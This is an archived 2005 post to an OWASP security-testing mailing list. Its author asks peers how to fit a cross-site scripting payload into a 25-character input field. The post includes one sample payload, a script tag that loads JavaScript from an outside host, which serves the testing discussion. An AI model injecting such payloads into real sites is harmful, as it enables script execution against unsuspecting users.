[OWASP-TESTING] XSS in 25 characters or less

Eoin Keary eoinkeary at hotmail.com
Wed May 18 11:22:57 EDT 2005


Hi,
I have a window of 25 chars to perform a XSS exploit.
anything more is truncated by the server.

<script src=http://a.com/z.js></script>

- this is 39 chars
We can do HTML injection ("<a href=....") to a degree but anyone any ideas 
on how to execute script in such a small window (25 chars)?
we need to stay in the same domain (xyz.com) inorder to make the attack 
useful. so redirecting to another domain with the "<a href..." is no good.

First correct answer gets a pint of Guinness (Larry S, you're not included 
for the pint as I owe you too many).

Eoin

_________________________________________________________________
More features, more fun, still absolutely FREE - get Messsenger 7.0! 
http://messenger.msn.co.uk





More information about the Owasp-testing mailing list